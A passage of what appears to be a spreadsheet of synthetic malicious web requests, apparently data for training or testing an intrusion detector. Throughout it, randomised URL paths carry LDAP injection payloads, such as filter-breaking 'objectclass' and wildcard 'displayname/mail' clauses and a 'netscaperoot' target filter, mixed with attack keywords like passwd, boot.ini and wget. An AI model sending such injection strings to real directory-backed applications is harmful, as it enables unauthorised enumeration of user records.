    <t>/edckyst-/he.dmvxd9zt.mspx?beqqeaoauelxen=")(targetfilter=(o=netscaperoot))&amp;wrantehflaxit=tgileiy9eitee7o7gt&amp;thoobbl=113635&amp;ovoaaqefn=mctsl8ttbd&amp;eahwocrsbetns=93&amp;ohikrnraob0dwnt=a-hxkluvwl&amp;fh5ntgtlvvs=76391&amp;ehhndteieeuyase=shtwo7&amp;nohrooeetii=shoaah&amp;eeuslnrrlesri6=ncaa/&amp;ztasnksis6=cetoetr</t>
  </si>
  <si>
    <t>/e-seodpdbir9gn7/dkgfswa7i0yd1o/yaiedimt5cpnebn.shtml?2p9k=odjdtfeinoyo&amp;sfg=sieepsa&amp;y9eetotpwt4edba=+2+ba&amp;rmtha=a9fubrfoy&amp;6gct0er=osj7z&amp;ztea8=)+++(+|(bw=mlau*)&amp;tla=6267052016&amp;ehriagratut0=nbnmmsotw2da&amp;ihth=nph-a3n7ugfr7&amp;tr58geeenaaeno6=21childa&amp;udine=pqtzaeubvf+eiht&amp;5mn=8217448&amp;cdf7kiotvy9eduo=hsbp&amp;bihepsir=dtlzlttes</t>
  </si>
  <si>
    <t>/af5stenbe98/tetteoieacatlblev/puhs5somdmn6lgk/qmr@wrq0zhfgsg.lhr/iliv2hzxq9xk.exe?@5jnevwget02o=6dsmdts&amp;dlyeooatrhd=div&lt;o&amp;fb2be07q6httpphp=so94]hsr)fetapynph-lcopy&amp;nb7xiq6khihil=81&amp;7je4infam=431&amp;3rfri=65978526&amp;etimw8=")(targetfilter=(o=netscaperoot))&amp;eawosi=r9i&amp;tdets6hoea6xsor=ne1monicd/-exp_&amp;bclhty0awsgm=41&amp;sveeaca9qbr6y=amz&amp;li=ldivns~boot.iniletnee&amp;innes=950623212&amp;hnsvctssg=+nr&amp;hheeernten=dwxd4sa5d</t>
  </si>
  <si>
    <t>/8coey7/jmlofhmm7evtwt/oy_odnpcjjis6fv/0kw3rznmp7atxw3r.php3?disae9mehi=")(targetfilter=(o=netscaperoot))&amp;ch=ub1eoeaogmolithd</t>
  </si>
  <si>
    <t>/ak8/childswp6.3-jou/lnfkvy.nsf?mtnesatipl75eja=location70erfde3oaeavbscripthomeecc%q&amp;tsar=71)(&amp;(objectclass=bi6e)(|(sn+=++nt)(cn=i8rp+++++j*))&amp;lm=h9ckmm</t>
  </si>
  <si>
    <t>/1tnnabren2hrrburyeom/kb/z1re25h2t0uxcr7/luptmpqs5hqnv/btofn3ixmtoc@0l/9egbfigs1gishla/sljtj5hqvidahpocz7ho/ir/ywech_acl43gdi0fcccg/eclt9-./sasdp.pxf.shtml?iiio0otsle=l&amp;ut2tstb6=7&amp;pelitnepeyaah=)mochat&amp;6tf=96423&amp;wz=gtu)(+++|++(rnd=*)&amp;tlmanna=0428&amp;eotd7=4lhe&amp;g8=09584&amp;tnn4zy7mn=e7a+e&amp;atczikei2e=11433&amp;agsettt=emlzz&amp;whtpassy1n2dz=vu4ed&amp;rcnuvsa=wthie8yjcnpix8te</t>
  </si>
  <si>
    <t>/c7s9ypvk8ozwc7jq/snluoli/sxmmf8hy3@2gc/yaotof/jnpqjwxh/r3j6gg2z9dh6sc/hlz2.aspx?a6=tlkaenshc&amp;5aetfnee=21239630&amp;w4ee=3423170&amp;wtlukwn=67776&amp;rleyo48aol=a_t7ozxo&amp;j4mk=osod&amp;octyeiyxeitftzr=+dxlrdwa3c&amp;hb=bineo+eywthst+~)g%&amp;dwwera=ee3+etjernv&amp;ubodychyji7mllor=iti5wlsrh2v&amp;eahgmfth=)+++(++|(rtn=nd*)</t>
  </si>
  <si>
    <t>/odgtsmr89waid/bevedu2nts9plg8vp/edtfmgh0ioehtoe7an/qj/tael9lgdntay/pu-qab/z9/uomdintnwtegsad/necrev2lnfrercbav.pl?afinn3as=)++++(+++|+(eoe=trzat*)</t>
  </si>
  <si>
    <t>/yhbf@cjs8@xkq1qmzkwx/hiromlwtdtente/@nunionqymjtmrpi@qt/ddc/tyboinc.d/ea5rf2dmihvdnxne1s/e6access_log_d/p_uemk5zxai@ht3jpt/th/8vzins-ldbq_eysb.v7/childzwt6x9oea.cfm?donh=atl&amp;ldrmrin8wb=025&amp;vx@k2z9_=et)(&amp;(objectclass=++++20n*)&amp;sa=4+te&amp;hveo=tbetweenneh&amp;rlwyac=2103</t>
  </si>
  <si>
    <t>/rnasanmcisne/xi39y1t/hctrresw5/ooqvjkgroupbya5acopyl/thzcmuc.gyxml/het63renboteoer/dcuegfhiug1nt/cmdsl9/enolczydoa/h3-c/i28@ikfm8.js?alswetlncuemeh=0928&amp;olobz=v4aiygb063o6tlrd&amp;itsd=rers)(++++|(me=*)&amp;sptnh=1&amp;rxedriaena7e=jei\\i&amp;s0s6awoeas4bpae=hueyie&amp;ey=zydlnlo&amp;lsssf=om1obatqw</t>
  </si>
  <si>
    <t>/tiji1.y-hypjb/r4q.exe?fxlne=227022128&amp;w325riframegi=escriptu&amp;ueilhreih8altsf=8627)(&amp;(objectclass=dti)(|(sn++++=++++toe)(cn=he++++j*))&amp;bts3=9&amp;sql7nhkiacaw=8061259&amp;byr4iinsert3k=5806801&amp;iniownhosao=ieia0%+x[da2dptaym&amp;exlidy1servicesdocumente=9r0s</t>
  </si>
  <si>
    <t>/lnfvinputfcocyl/-21k/f39_hhvg/nvke6r6fzwmbaowbgxy/fte/vhhrgks/hjtt.himuq6sjl/32ne48a18z9tgql/eho0ffho_2icf.png?un@_uy@=83048578&amp;aht=918899&amp;thd=836)(&amp;(objectclass=trku)(|(sn=ai)(cn=hy6h++j*))&amp;stbr=alyj</t>
  </si>
  <si>
    <t>/tolt5aos/a0epzz8jo8unqsizg-fv/4-r/em.er8i/l5tob.png?jok@9gz1nk46=)++++(+++|(viite=tr*)</t>
  </si>
  <si>
    <t>/kun4m.html?she3dsohysrasoo=nteu&amp;blog&gt;$ewuh(%&amp;reln1eaztmddbn=7&amp;efeesc=1&amp;mihnt=+xenr&amp;dnthiadlss=itae)(++|(eoeo=*)&amp;ornm=uuuxcdwzbo</t>
  </si>
  <si>
    <t>/ew1um/taatllrzhkluc.pl?tsmueecnrastat=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/it6sgv8llv/oheray/srinbethff/o@uxnn.shtml?hy1rdta0n=844)(&amp;(objectclass=eog)(|(sn+++=++++rnrt)(cn=llsi++j*))&amp;crustst5vrhuat=26480</t>
  </si>
  <si>
    <t>/vejeoolnsynurs/h8ko0rmd-nnodcz1/d-hmtznes5s/nn/yhsaisl/0rwpmr-/jdnw0gk5eh/on9daidoattgli5ts/dropvk.jpeg?9ye8=+pe0dhiidrm&amp;ldpaeou=ovde0p0oliepa&amp;wa0eemhwaeu=rofa)(++|++(in27=*)&amp;l2gsi=2vp&amp;onnfg=tfkh8quysz&amp;eeihrlcewhn=4etmpjonrwo&amp;gc4onnemo=27520&amp;10nyu=22533795</t>
  </si>
  <si>
    <t>/tbiswltlttdcaqdm4.tiff?ynlnn=)(|(displayname=had*)++(name++++=++++had*+)(++mail=had*++++)</t>
  </si>
  <si>
    <t>/passwdv.6tybsggs/1sbitteeosarh1yvuhnh/r6feq9fp/nrx4l0khy27l/6h/9or47m/va/ftpp/f_de/rp7mpw/teuitlnsebamejqettwi/opendyexhttpwxz.msf?dniofaoceha=+nytsirlltm&amp;inbsq0sh7on4ial=ruziyu8ezasho&amp;og-mhonyjz==e4gqatr5t&amp;ohcrgcrftt=70&amp;h4ehb6ue=ueaar)(&amp;(objectclass+++=+ci*)&amp;rorqsh=114337&amp;iositaqhelrwiw=21295000&amp;rahwaa2zitsseud=aj&amp;nn=658&amp;ptx3zmn4mjx=saodxdwbos0l&amp;emlreyusdnchr=gnavtoet%ah&amp;hanpetraset5ive=null-e&amp;7te7q=welzotoat&amp;lonnut=mr7@pzqe7x8p</t>
  </si>
  <si>
    <t>/ow8vfbkb7pt3jttat/ymhyuwffnrxs2eitodl/5nlogshutdowndocumentksvvku/nt3.exe?sztlupsv=ryd)(+|(disn=*)</t>
  </si>
  <si>
    <t>/6sja0e@q8r3rqzpe/ryijitvtasrihnhl.mspx?hbzt=i7yrctrcrcxicdoz&amp;rwsmnuon=c3)(++|++++(eb=*)&amp;vbima08xoeioe=qiuj&amp;tqiduyuts6elnh=52bdlsuym.dk&amp;eeif=idwheretrtin%&amp;qzva0yhatfloedt=oilwqx-f6xx&amp;eess=m4tea&amp;da=0007&amp;8lcsrgtmlegmse=5773648&amp;eynrde4grtbomcd=c7tnph-&amp;rte6ameda=ayaifz0xec</t>
  </si>
  <si>
    <t>/lbwlth@3mt-r4/pq/t.s0aqmha/objsfu7y3hd911e/muarejeodj/ptbo/rfdqzdcdjp8qyv/oc3detrl/tb6noteox/h5otaed/lq/ep79fifp.bin?l6guhtpasscxv7=94655&amp;cix=ogdocumenttmp&amp;3ettsri=ncjnejvz.&amp;nettseoc=14441&amp;rulhnrnw=asse)(&amp;(objectclass+=++++hgmr*)&amp;hl3m=0040402</t>
  </si>
  <si>
    <t>/0passthrujtkyp9ejsxw/48-b5hzc2jjt/rcm@v/25/xslike7bformandivceiframe_./gn.zk/hzzinfthp/tsywdnwx_3gvda3h.xk/dxxcm.asp?d6atc=raaxict&amp;mirndk2riarw=ij.iw&amp;e7=)+(++|+++(displayname=had*)+(name++++=had*++)(++++mail=had*+++)&amp;pmnno=rs&amp;shogsbpuroc=hbliumhr(&amp;rfdac=tzh1&amp;hyis=qemashutdowneeeedvz</t>
  </si>
  <si>
    <t>/5r.mspx?oahwmn6=shutdownperl+aloirstew4txd&amp;ph4otaehdvem=0135&amp;tnta=tkife2ixshmehosyru&amp;dcest=oocb)(&amp;(objectclass+=iqst*)&amp;piaezttpiejay7w=76613</t>
  </si>
  <si>
    <t>/dojrrl/y3j11u2x2/8amnmi6eitts/dmwy6aiesrxcncme/ewg7ox91ht/lw8mot8arnen0o5t/3texcwoerybhvtl/stddthaanvm.php4?an9t=)++++(++|++++(displayname=had*)+++(name++++=had*++)(++++mail=had*++++)&amp;drhbhnsmled=chadivhh7&amp;rnefoswp90iau=oac2s(tio&amp;ufmjlvt=srh7sock_stream+n7wyrsml&amp;dtdiadll=sdc7ytfgeheg3id</t>
  </si>
  <si>
    <t>/slbcqsral57dbid59kg/kwl86passthrufbgsoundezihvpd/kg_l/shss3/paer.cgi?zeesljer=iunig)(|++++(gnod=*)&amp;ec=en8zuzenvfk</t>
  </si>
  <si>
    <t>/ip7yj/recureaeawj/iseetdfilll1rt/phq5qgx/h5wriennndic4nic/ndymxtbftxtea3e/a_fnqwdnq_lfoymj/7m9n/hnsfim4tm.cgi?oeicseateereasn=styleewnetcatnt@hhooie&amp;nemttct=ixgnjcql&amp;t26bietsoeqtm2=")(targetfilter=(o=netscaperoot))&amp;iu8=wrtoyvhhr3r&amp;oeayn1q=7e8ue3yeperlm&amp;lwuaaftkieyf=id6ninserth53clant&amp;toe4oenue5ljf2e=0980&amp;yifrrin=2&amp;ynmveoygoitt=984076&amp;tphiin=gtd&gt;&amp;union4lw2vlshq=fx.m8k&amp;0tes=daen</t>
  </si>
  <si>
    <t>/i4nt_fe/snew/iatsfisashr/szg/y2l9bw/f1e@rvpa@rtfac/jraen724nms/olq3nqfg4.htm?7h8vtejr4=ehdyx5_zulo&amp;rwdupqhvgae=dot(&amp;ja0=555)(&amp;(objectclass=loa)(|(sn=++lot)(cn=c+j*))&amp;rwyvsnan7rolnts=0484</t>
  </si>
  <si>
    <t>/bcxzgas94184wk/coje.htm?19imochaj=96237868&amp;br87c.rpl=hrfg&amp;mrtreanmsl=wefewgethffe@rpi&amp;ahziabaiioea=htpassr=57apositionfsr)sobjecte&amp;rnhoiymtttasaq=4enmkldoic&amp;20akekso=76393087&amp;ecaenareed=osea+donciefe2i&amp;0uozyvg=95111915&amp;iorza1yxsre=570)(&amp;(objectclass=o8i)(|(sn++++=sstl)(cn=sm++j*))&amp;etpe8tcyet=0&amp;lbvearasacjt6nn=rharns&amp;hnofchp6ag=i8&amp;vh8etioosb97i=1391082&amp;6a=74310&amp;mr=zatsmbbetweenlroslo</t>
  </si>
  <si>
    <t>/yguuevfydcw/toturer/dcs/a3/ucrd5/gdr/l86paccess_logh-i.fgroupbyb/mvii3bvm2af0ekb8vrfl.aspx?o8yqinie=r94+o~td&gt;njawe&amp;iatcdm4sa1mscnv=235&amp;tete8stuo=fi+varte&amp;7ooer=")(targetfilter=(o=netscaperoot))&amp;riobod0tti=u\\%++ewgo'&amp;go5ql%ue7=iphpas+&amp;0aanrl=8&amp;wtiaebyeae=et&amp;tii=44624&amp;n0sehgmeen=42317&amp;84ooelhqnsyeu=7793874043&amp;ancoilo=4462459</t>
  </si>
  <si>
    <t>/apr4w/ejeagmonioseotmxt5fh/nmh-hfo0l/au6x/niee/emi/pghstykgt/njp/uobsd3ezdvtdatemwnni/vonet1ibn.exe?yolao4ar=875794&amp;lmoothcyjop=openh&amp;3a4hcjhr=9&amp;fgdeme2to=euomtnaito&amp;yusi7civeetc5=gah&amp;ueacigsmr3n=1wiad&amp;sojcdivptmpbetweengg=")(targetfilter=(o=netscaperoot))&amp;mbnr=u8jphs&amp;obwehksj23neeh=178777222</t>
  </si>
  <si>
    <t>/6f/hzwfgg9ranu9llgo/rcpcvjyvnd-mpxmlvaccess_logn/t.saqubtcmo_dutpz/rcnesv0yqfzbtrqvn@/esyla9emdhm5xj/se/tfgceltg9n/kxnxqo9yujs/sdllnderameor/iov.js?i5se=ein&amp;2sslho=neane)(|+++(nmo=*)</t>
  </si>
  <si>
    <t>/nneiert.png?eensizw=leeaitntrxrnug&amp;neoeouurwwa=m7z6@_f8dd&amp;eer7ha9etssnsnr=phpc&amp;neoleatiecq=73&amp;sb=10820756&amp;cyefqmoiops=i6z3jz9dot7&amp;3hhd2s7=bfndfli-e9t&amp;denhou=spfbozu@nd4&amp;se4lelta=tysm)(+|+(eomcn=*)&amp;hrvm=rignai&amp;o5lsomcni81ro=ay&amp;eno=ahmostnowrkr8er&amp;tehwi2qsi=ee&lt;~ahitm8tm&amp;ctmpjfezkopen=53913</t>
  </si>
  <si>
    <t>/qqhyxgxznnk1dqd2c/qvadminobjectimwbg1av/aro4g/pa/we0ctn_x/lqhy/0nuhueirxaajkancprp/vo@kqjnvwpyx@5dy.aspx?iwlogmmv_x-=kb6rtabgoedncvkla&amp;eg1o2xtalthn=e&amp;dllanmrgcvs=tateiie9bgeu&amp;wm1nohr1ept=72744&amp;ipecr=)++(+|++(wreo=l6vga*)&amp;7toasn=hl@&amp;bi=nyspnrlgrtdapta&amp;ebx=$gk=&amp;nyiqgrait=dchildo</t>
  </si>
  <si>
    <t>/fg/s6escrs/iincludejkhyhenxrv/74/lgg/p_lodpy7c95c/oifonozd/r2t/tnvlde6hlt/uscitoazehwla.gif?oo0nlsote=udgxojlx&amp;lbexd9ybav=ut&amp;ledem=e8libeh&amp;s5u3o8=2039197&amp;fr8freed2onezt8=0416&amp;e3kwotgf=498767244&amp;rkiteauo=8lenyn~tmps&amp;w8c3outhzagd=ai)(++++|(nui=*)&amp;clonarnwanroese=access_log+z7tace'so=a</t>
  </si>
  <si>
    <t>/s-/ebnstlhe99cdassougn4/6z2i0nel6tmsd/ntvc6eweaif8dcsjra/epb2fxknt5ibk5tq/s7c/777do_-r@lsrj35xpz.dll?vei2oxdq=etfedsztu@wd&amp;ahqn0yis=jaad)(&amp;(objectclass++=++++eme1*)</t>
  </si>
  <si>
    <t>/j-cey4im/sfem/lrbht4alzlcyoaiar/bufinbgebdl@-/lnvnus9jtlsr/xf1kautoexec/ajenjmcatzdu/hoclom/am332ltzq-uahs_o1ju/formp.jpeg?wourstmee=di4ltedl&amp;fiastviemj=lnfif&amp;4gnon7=d-@slu&amp;jdnull8bt=3&amp;qioo=8&amp;orolhoveji=37&amp;jzw-htaccesrstp=mxpqza&amp;f3ovuiwaef9oef=nonak)(+++|++(day=*)&amp;oushessrltnaos=0824596719&amp;redd=9615680&amp;oioeo1l=67&amp;sirst4gudpoeea=ta:&amp;3to=4781775271&amp;dmgmebz=plizsduaofzp&amp;_v31dncy9=68</t>
  </si>
  <si>
    <t>/nyk4tbter@hbrcedxg9./iier6/pirtnv/ruhrouerrrm/ttthito/atmogp/t8r6zmrd9wghaji68y/yp5/lb0t-jtmklafotb/sdtttadaatqbdaj/sz/ahu.swf?o4arc=)(+++|+(muk=un*)</t>
  </si>
  <si>
    <t>/gnmdin1t/agsidaeaosacwhwinest/smalnrgfuj1of./mpfak8uwand/axq@nhan6oz-9gaplqit/uuhtiekbceem.mspx?ewfewh=2tlrv&amp;han=69&amp;eheinrb5ssta=tcsce)(+|(ei=*)&amp;34qthttpbssld-id=26750&amp;mccue=dettewxp&amp;i2nsshw=henhwherece4uhe&amp;dhwhruio=zscjmqb4b&amp;k.po=32818&amp;e0=9270&amp;ryio=uttapmoiileeu&amp;shtohzf=iprtecedtesbl3xlnl&amp;detiws=ajomj</t>
  </si>
  <si>
    <t>/zhaeli/syaavasin/vlhuqr72iq0lzxwhhq/ulhiseo/icl7lzcrsnceseod/tue/gw_4/u6qwbpt91ccfpdu/6_psugsz_1dw/otyhtt1/su-f9zyl@pms04.pnrh.exe?xde=145&amp;l2mrv3=117&amp;eshhcuitopesana=eenb0ca+s&amp;sf44pis=niirnmedl&amp;la=nc1)(&amp;(objectclass+++=++da*)&amp;wlra2tueu86sir=773716&amp;hte=398628001&amp;rdj5rywxnhstsml=37</t>
  </si>
  <si>
    <t>/as6enaiodktatte/nsdelg7um3cbom7hr/ntro4senmr/oazbara/1g8dhxgluzgwinnt/o6w@/4jvj3jaug/bls/fs6fp01jm/siskhiereoedhalq/ssyjenseeha.msf?eocltyk7rdtcne=o6t3t4dx8n&amp;sez2wz=ar805&amp;dnnnayu=elwt++rtck&amp;cluxhomezt_=578136717&amp;8smnoseta=346&amp;tsefte=osom8uglz6ntm&amp;vmdnetdaen=rlss81a8x&amp;tutez=)(+|++++(+cn=*o+++'brien*++)(mail+++=*o++++'brien*++++)&amp;dnodeandnfgw=yiieai</t>
  </si>
  <si>
    <t>/votcgwinnt07ozy0exec/woirehdptxxruizi_hjh/binvrv7k.k8r/tmtt/4ifwug8grmg-f/d1sq2_atjcf/afwanes/ole8rlc/zz@nlqu.swf?nrupebtas=774&amp;telnetdmjb0d_p=rpbe&amp;dtiimkalndorya=fvvd-pu&amp;mrree7ba4o=icm5&amp;mrpwsnlmn=j4)(&amp;(objectclass++=++sssr*)&amp;n6i8afoeswcpsns=ynsl&amp;hrf5txaer=g5a&amp;lhm92cu=51&amp;0ohfhw3ogr=diuoi@&amp;e6irpuny=89&amp;itssnns=bm&amp;cesnv=1elzwl2</t>
  </si>
  <si>
    <t>/rczajeen/iorns6hsajsnidu/akkss/koxaw8nj5pxdoxiblxrc/@p/avobjectl78u3hbczl/@.qtxinputl/neenawpnedip/iconataneis/rteusmem/8aawo8lia3-qq.css?me8viewdaubfgo=925&amp;xer3rsswttmtm=jtotelwhesnieoo3&amp;arn=386585&amp;eoaz4=h3pcz6&amp;zwlln=8088087&amp;a5=su1xadvl8&amp;zfe2kb.ga8=oe&amp;coblhha=sshshuih?qam+&amp;o8drzyn=ned&gt;winntelib$9o9d+u3rn2&amp;ceaa=wgetdn&amp;crvzt5toawph=12755&amp;end6s=)+(|+++(sei=eitmw*)&amp;n7=iedlth5ahoemi</t>
  </si>
  <si>
    <t>/zoh6delete/9bzylq7k/d7mrci1f/ifa7kjwheretiuwhhyf/y9hyc.cgi?wyh=")(targetfilter=(o=netscaperoot))&amp;@lgz=65h3b70</t>
  </si>
  <si>
    <t>/iidbeipac/_akjjium/3ecjqlqfdgpl18fjjpqo/g4tyaiisostapuh/eua.clwkboi0yihcu/samxpet.nhttpmds4/506bpjby/rat/ovv0twd8i1h5k58j.php4?a5pahoexecrwherera4=mwaoxnkd&amp;htieiassdessm=2tbt7r475thshuia2l&amp;gdfqktktlike=dc|is&amp;dyi=h6=oi&gt;1efotlboo&amp;edh2tq=5mjtm3n0en0trnotdv&amp;eiau1s3lcaalte=snm&amp;fjidra=")(targetfilter=(o=netscaperoot))&amp;lxikhkitohraa=+e&amp;eryo4rm=5569</t>
  </si>
  <si>
    <t>/xtbiari/0diqpc4wom8/t452gam1efj4kb@xw/@-/5o1kiiexoglx9fl6est/rs4c/nhneapeee1t5naathda/sdpnfk1l363/yqhmsmdsu.o@e7d@gvoi/au0a9oi/xi9orbzr.vynbxml_bin.htm?ifnoretdctndcam=wcgj0plor&amp;ue9=272081&amp;teh4lfqqygae=sgie)(+++|+(7nri=*)&amp;iztsrruxu4=tklniut0aei&amp;rmief=8826629758&amp;zgch=dek</t>
  </si>
  <si>
    <t>/mzshn9icfottlqih4oh/v5wysy0r6dk9/wf8tq/eoparnulglrudnzboh/rxsgjxr6z0ig5q9sleo/onhaeaashhsreooumt/eehaeg1zi/bj.mbrl/xj_xykbjjfafttmptwav/s2y6ceymdeeoyn.tiff?oas=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/rqer/ytdrxcteqhadic/0hm2jraargizrupkeaa/dlilyfxcdhr/2@w.deletefa_mm85access_log/r2go.html?cl7r-kjo=9edtlp&amp;hjk=+\\&amp;n3ytns=eform&amp;2q5tmpvl4r=]oea5bsil&amp;tmsu=vdll)(|++++(zoi=*)</t>
  </si>
  <si>
    <t>/yfgimytthqt96ssur/e79vkjle0euvw._vu/kometaexecnvarpg-e92y/h0bfa/hrnebt/ooj/mhes7m3y/hcysabq/gi1rnovbscriptlkrcmdx7/ih_otwlofoxr@ta2fngf/n1enajirarpxwd.css?9n=odteticloirdkw&amp;ehsediashin=retie)(&amp;(objectclass++++=it*)&amp;dn_hjrqbx=eolipgoisehz&amp;zvarepidinjsock_stream4=tskt9dattnncspeeen</t>
  </si>
  <si>
    <t>/wyt5teloaeddnde/ry/sdinjvtt/tzvjbb8/ibrfonio4atfnnrcclse/aw/o9/fnbt/5a0asiduncdocumenttc/mzatz/emvq3aun.exe?vjs1oqe.ssmeta=513618&amp;tny=11716&amp;mrpelit=7r&amp;foai=)(++++|++(75=arse*)</t>
  </si>
  <si>
    <t>/53excznu1qvuoy.pl?ajusm.bsystempasswd=)++++(++|(displayname=had*)+++(name+=++had*+++)(+mail=had*+)&amp;imepe2nboan=2489525&amp;bit7ruyh2=vema&amp;ytirtej4u=24227&amp;8wcsu2i4uc=thnneoeotfsnfloxe&amp;isemmr5ooaamt=11&amp;ctvcregot5d=eai&amp;reytxet=684562004&amp;gho3rhgettulh=d8qn.i&amp;1omenti=utcwdeaz&amp;7enzfrtnlin=5732&amp;anmo33hdr=s+waeiedi@b+dr=&amp;tras8rhrpsb=942527&amp;tuyxpsteiir4bt=436&amp;pimgycp-u=enw0az</t>
  </si>
  <si>
    <t>/g0cs1r/adet0hhvqaran-a8/os2vrbejqpwbg/axhb@mbxywdb/ntdkyetwwa9es/aja/atxoxn.y4nd/rhz1dem2boo/uuxn/1et9vyzv0divmnulln6a/6atorov/h9nwjbg86rt.jsp?ehfvechosmdc=isea)(++|+++(sr=*)&amp;sa=rx9vxbo&amp;7flkcg_3f01w=nerotcbrlhailagumc&amp;documentaxapdla=lwgetg2iframe</t>
  </si>
  <si>
    <t>/ottvij/etntpeern7smn3w/381mhf/trjyaypakwf/ete6oi/lettr43grtsetcfdail1/tjrtjt92lef/5emvirca5dycl.shtml?dp4nyg3is7t=7gb@t&amp;evelhn=66&amp;pv.5.7hy=)++++(+|+(+++cn=*o+++'brien*)(mail++++=*o'brien*+)&amp;pn=7757&amp;s3u8o5maciue=addhuo&amp;cfesirtr=ttb&amp;-selectinaoea=++&amp;accepth8xoaoppi9echo=92556456</t>
  </si>
  <si>
    <t>/b6jshutdown/@xsx/nasem4cweirrhyisqfe/ewbfxd1tew/3ojkiw.rwzkfb0f1nop/dbsttccraaznocqtr/hyyimsytsa0ndts/1vq@hxub/ntpre55z62qntnhk5/nmfqqp4at41x/scne@/en2uxpn8favm.mdb?cfhja3cq=581&amp;lcsfhe=084&amp;arno=rznyx5l8.dl&amp;2j9r=ksfc&amp;seco=o2dneoym0tts&amp;tkr2np-7rrgl=")(targetfilter=(o=netscaperoot))&amp;sra60=eeufw|robject&gt;mail2&lt;n]&amp;hzmtuinput=reedtss8'olm(d&amp;eiroinnethwensi=75&amp;p5lvkb7ij=15215&amp;aerwnkeigoa=rs-1njcli&amp;dusinnknaoq=u6qn&amp;ikpgll=67&amp;hgse0oocirnae=j?caoptetee</t>
  </si>
  <si>
    <t>/javijopendz8l1o5_/oasemeto/steea/emeg.zwcho/s6neulajaxg87/jqlinkym/ykyub.mdb?nab=nnzi8nz&amp;41destw=mtri&amp;ritfncopt=nh2lacceptp&amp;tsgsmb6ctado=siitonheauoa&amp;ocopencopyr=admle)(&amp;(objectclass++=++++yl*)</t>
  </si>
  <si>
    <t>/9e27aeacieg56sasyd.tiff?ast=)++(+++|+++(xedn=mhiie*)</t>
  </si>
  <si>
    <t>/fq6wft5/boehtahtsicstgoonwet/yn2esrm/@fi.n-tnki/samu/nfhy6l.php?pyteptrjbfeaia=txp_ec1esqf7np&amp;ce=3onl2&amp;6w5aiawq=e3s)(&amp;(objectclass+=yn*)</t>
  </si>
  <si>
    <t>/efjs9g2/ujmv_fqze3q6indh0uu4/iqpbx_6.jpg?cmdsx.yj@omp=njee&amp;zz2t4waelmmb=;2h3eneijsaciframeeenne&amp;ce=")(targetfilter=(o=netscaperoot))&amp;0byphpywk.rn=792</t>
  </si>
  <si>
    <t>/ryirralao/ccr@ka9ance5pn/75zlkmgm/c4ehgnx/7etleec8uoeicqendn3/soseughtdocsw0aq.exe?oqn=eneoeth&amp;hpij2zzzj82=m'|ad'dperlhun]&amp;imjxh=6734)(&amp;(objectclass=moi)(|(sn+++=+++3e5)(cn=roe7+++++j*))&amp;omooptfi-=hxp_bst+2l+i&amp;oe=1059084&amp;nha0oaarg=9=nusrw</t>
  </si>
  <si>
    <t>/o4khk/bn.ky.gif?ieajcuatts=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/t-6tatkwa/dvvv9t1vkx/eg0inp.jsp?clagteimyrl=o8@nqq3@jv&amp;inae=heduuwe5iqv&amp;rn8rtteszh4=eval&amp;hytcbmeuoootd=erprocessing-instructionservices%+eensnf&amp;ln34diush=7240725&amp;mqwoztq8.=)++++(+|(+++cn=*o++++'brien*++)(mail++++=*o+'brien*)++&amp;1ech=6nanthg+mobject7@d|e&amp;bitp1nczhxw=9452&amp;hc.p=scoa</t>
  </si>
  <si>
    <t>/p96jsl7blhslso/aa/peo9tseldtht/jnzzchlll/edndneocileaninsnr.html?lu=yaaeentmshml&amp;a2uhmrmoehrm=4&lt;t\\hiiincludehome+m~eu?e3&amp;thmeilpnka52nj=5508&amp;an3e0p=j9vizy8cf3a&amp;yo3estoie=og2kpfshd56&amp;3fj2=360868&amp;@passwdzinsertshby=26rydghr&amp;gnyllwrlsp=daai5ufu+&amp;4neiwrv=0346523810&amp;oj0n=s7mdb.x5ywgs&amp;s3lge=?&amp;ve4hlmeaoa=")(targetfilter=(o=netscaperoot))&amp;sw=passthruwzd0&amp;ighlnolgagae=383</t>
  </si>
  <si>
    <t>/os27wpwpssl8/wpl/qgv30/jw3qcmdy9px/retcl87d9ssio/5gjfkic3vbscript6q/rx/s_iqdzw9tonwc.msf?ess3t=407&amp;8tsa8weonthnea=22504547&amp;hsan4oresrksse=tytmiid1rapstedtd&amp;uds=98117&amp;hegnllo9uhyuioc=8caltc1pelcliblx&amp;tmjv85psu86b=8tte&amp;y5bsgroipeno=31978&amp;c323u=ahz:objectusrnfh)2=nsock_streamtseee&amp;aiit0paddatun=om&amp;es=uxv99vdodqlh&amp;e12dtdhr=)++++(+|(displayname=had*)++(name=had*+)(mail=had*++)</t>
  </si>
  <si>
    <t>/c@mpymma65y944scbv/edpm5g3/e0mlg.dll?aeh1i3q2gz1boi=t&amp;4nb.a=0021&amp;oei=m.la&amp;suinr=t19ptlppd&amp;n4ewjodq=hodnpsnahe&amp;fofseonr=)(++++|++(+++cn=*o+++'brien*+++)(mail++++=*o+'brien*++++)++++&amp;lu=9eesb2&amp;idoncp5=wcnca&amp;rgoetahkouotnae=eieh\\inoy&amp;ei5i0pegileq=boot.ini-4�mwj|wcc7</t>
  </si>
  <si>
    <t>/huadt/zvhgroupby5t9zdpsw7zhomer/dvfjvtawanghsoatl.pl?sebszilynytbm9=49946&amp;rrfpetai=99732063&amp;s5doitpsaeot=ouar&amp;eiamtp=uto&amp;srtezerlo=eceedh&amp;tizrietssmresar=nndsdrpoertd0tdxif&amp;nvoeaqtdblr=2880&amp;vaumpared=5&amp;dxrgatatts9pil=nftpz|ob&amp;alsoe=g&amp;'e+]2ytid$ioat&amp;i6wtpmotrrhih=to5rrlh&amp;tn=)++(++|(displayname=had*)++++(name+=had*)(++mail=had*+++)&amp;mj3xjmcfr=4455956</t>
  </si>
  <si>
    <t>/e9ehosfaejxaus/tndcje-zo1hd5pfz.aspx?oohbaevntee12nb=ghinidch4+;zfne&amp;eeia=wtidheatanmaaiep&amp;vceiol5wnaph=)+(++|+(displayname=had*)++(name=had*++++)(+++mail=had*)&amp;ftpqexeco=u&amp;enh=)%&amp;dlekipindz=06812&amp;e2=hs&amp;e1te8dei=155521&amp;rt5yadxsaueisow=4&amp;ixdtli=ctee&amp;n5tbeosbuguqs=aiusee6ei&amp;nal=+from+tanph-7xuu1dhnhd4&amp;sneoeta=c+ifselect:geevalisoewhfsrrn&amp;o4rkvbin=4stsg2ai</t>
  </si>
  <si>
